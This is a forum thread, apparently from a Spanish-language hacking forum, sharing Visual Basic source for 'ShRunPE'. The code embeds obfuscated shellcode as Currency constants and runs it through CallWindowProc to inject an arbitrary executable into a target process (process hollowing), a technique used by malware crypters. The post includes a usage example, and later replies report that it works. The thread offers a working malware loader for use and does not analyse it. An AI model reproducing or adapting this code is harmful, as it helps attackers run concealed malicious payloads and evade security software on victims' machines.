Locked shRunpe By hamavb

[Expermicid]

[lenguaje=vb]'Author : hamavb

'First cut : 02/03/2012 16:50

'Credits : karcrack & cobein

Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)

Dim Asm(160) As Currency

Asm(0) = 3011782251321.1488@

Asm(1) = 2842944510165.0021@

Asm(2) = 21475170.7244@

Asm(3) = 3039972698908.2734@

Asm(4) = 0.0108@

Asm(5) = 0@

Asm(6) = 0@

Asm(7) = 0@

Asm(8) = 0@

Asm(9) = 0@

Asm(10) = 770918988510973.1328@

Asm(11) = 609196292101137.4146@

Asm(12) = 318076019310180.1508@

Asm(13) = -857485367476117.5446@

Asm(14) = 399392180.8913@

Asm(15) = -706833318868351.5511@

Asm(16) = 6879439133396.1731@

Asm(17) = 763810498335316.3776@

Asm(18) = 388654513.6166@

Asm(19) = 98506041997.169@

Asm(20) = 24964196938431.9488@

Asm(21) = 22034984796.16@

Asm(22) = 305625529718164.0704@

Asm(23) = -410459675325501.5192@

Asm(24) = -172419915909691.6991@

Asm(25) = 150655457759015.8157@

Asm(26) = 763810498295053.1535@

Asm(27) = -334758189796557.4082@

Asm(28) = 763810498175933.6042@

Asm(29) = 769693235337619.0272@

Asm(30) = 658651445508203.5218@

Asm(31) = 93228415366.4744@

Asm(32) = 337544363.4688@

Asm(33) = -171181400105556.1333@

Asm(34) = -43143787013419.7499@

Asm(35) = -843073848963811.6758@

Asm(36) = 586115344006226.9449@

Asm(37) = 81903309047.8335@

Asm(38) = -170655782147139.7888@

Asm(39) = -296106572219468.926@

Asm(40) = -171744351251070.9758@

Asm(41) = 478565684273270.0365@

Asm(42) = 766128157362243.3@

Asm(43) = 763822153521118.6688@

Asm(44) = -5798494293561.088@

Asm(45) = 292876624.968@

Asm(46) = -303308424893800.028@

Asm(47) = 18687314406408.1922@

Asm(48) = -814921249263117.9264@

Asm(49) = 377936345376908.9026@

Asm(50) = 914455950214871.0911@

Asm(51) = 793381819255881.7282@

Asm(52) = 247979454486563.4385@

Asm(53) = -842580059571706.7544@

Asm(54) = 261953043.9225@

Asm(55) = 1351124663940.1355@

Asm(56) = -5728895679889.4336@

Asm(57) = 16435523184027.2177@

Asm(58) = 453291086712582.9632@

Asm(59) = -171181401297649.6638@

Asm(60) = 247984901789109.5093@

Asm(61) = 763853927511347.5304@

Asm(62) = 68764336814004.0238@

Asm(63) = 377880083361326.677@

Asm(64) = 58153857883.8015@

Asm(65) = -170634502550313.984@

Asm(66) = -6846382739763.962@

Asm(67) = 217285200.5584@

Asm(68) = 273152312385105.8024@

Asm(69) = 13733354816300.6466@

Asm(70) = 764000768607145.1648@

Asm(71) = 17395153563837.4458@

Asm(72) = -353751767489869.7902@

Asm(73) = 763363.3281@

Asm(74) = 392094642558210.6624@

Asm(75) = 764766522162398.7432@

Asm(76) = 126410412043612.3678@

Asm(77) = 27351427555.8027@

Asm(78) = 11706747011255.5776@

Asm(79) = -757276053642969.088@

Asm(80) = 360268856045024.0513@

Asm(81) = 749398978656993.7514@

Asm(82) = 12354147786351.6251@

Asm(83) = 769693219347778.7648@

Asm(84) = 414640788194904.6822@

Asm(85) = -171181417231738.2261@

Asm(86) = 276807880992725.4373@

Asm(87) = -842805239553082.2424@

Asm(88) = 37043291672.0721@

Asm(89) = 507392545273423.744@

Asm(90) = 769258247064186.1864@

Asm(91) = 68764336812483.5886@

Asm(92) = 360268875651665.0832@

Asm(93) = 749398978495932.017@

Asm(94) = 9651988025294.3009@

Asm(95) = 769693219347778.7648@

Asm(96) = 126410412042563.7942@

Asm(97) = -171294008471547.0205@

Asm(98) = -387449256181707.5451@

Asm(99) = 363299752439103.6175@

Asm(100) = -410459675325517.2888@

Asm(101) = -172926570866094.7199@

Asm(102) = -635688100489173.3787@

Asm(103) = 763810497261576.6376@

Asm(104) = 126410412042144.3634@

Asm(105) = -843073849903335.4646@

Asm(106) = 769693215773368.7817@

Asm(107) = 414640788193698.8194@

Asm(108) = 4951342415221.7475@

Asm(109) = 4636260512845.0048@

Asm(110) = -171631782205882.368@

Asm(111) = 507388721888441.1549@

Asm(112) = 31815578412492.9256@

Asm(113) = -872572382190820.8041@

Asm(114) = -286501654647065.8048@

Asm(115) = -428658242031485.5343@

Asm(116) = 3149895693349.6588@

Asm(117) = 22752143878461.8496@

Asm(118) = 10655039450.0177@

Asm(119) = 19434514006.2976@

Asm(120) = 2249161163731.9936@

Asm(121) = 590215178835617.3824@

Asm(122) = -171519195984216.1688@

Asm(123) = 334471606820667.3981@

Asm(124) = -6937148713125.7624@

Asm(125) = 3006614124114.7186@

Asm(126) = 457802337043140.7336@

Asm(127) = 34749504.673@

Asm(128) = -843073850212036.239@

Asm(129) = 536232810004781.4409@

Asm(130) = 699902812802672.356@

Asm(131) = -439434742750697.5805@

Asm(132) = 756604737376275.6714@

Asm(133) = 869968633553.1604@

Asm(134) = 450404738465.792@

Asm(135) = -7194094211452.1344@

Asm(136) = -1353710065018.4752@

Asm(137) = -439079356974065.2545@

Asm(138) = 566676858034822.4232@

Asm(139) = 32602016.4622@

Asm(140) = -7089160921751.4365@

Asm(141) = 410061545662244.4496@

Asm(142) = 617979275378688@

Asm(143) = 725985904952471.1762@

Asm(144) = 854193482151915.9435@

Asm(145) = -842159216757581.13@

Asm(146) = 457592490565246.7766@

Asm(147) = 17684902147728.7019@

Asm(148) = 643884385768544.0491@

Asm(149) = 622040492439682.185@

Asm(150) = 842553683379673.7879@

Asm(151) = 865826324060815.6483@

Asm(152) = 233132869356380.6979@

Asm(153) = -841594865717950.1309@

Asm(154) = -598169487549740.1085@

Asm(155) = 22006038477175.2068@

Asm(156) = 843978581769276.108@

Asm(157) = -840178504924852.7391@

Asm(158) = -836852911227146.7764@

Asm(159) = 643884385767650.3812@

Asm(160) = 328436.0538@

CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0

End Function[/lenguaje]

 

Ejemplo de uso:

 

[lenguaje=vb]ShRunPE "Target Exe Path", "PE data as byte()"[/lenguaje]

 

fuente: imsecure

Edited February 16, 2014 by Expermicid

[(Sony)]

mas o menos como seria no e podido hacerlo funcionar a ver como esta

[EL_MANCO]

se agradece tus aportes tio siempre trayendo cosas muy buenas

saludos

[Expermicid]

mas o menos como seria no e podido hacerlo funcionar a ver como esta

 

Sony ahi abajo puse como llamarlo.

 

Y hoy lo probe y me anduvo bien.

 

This is the hidden content, please

• Sign In
• or
• Sign Up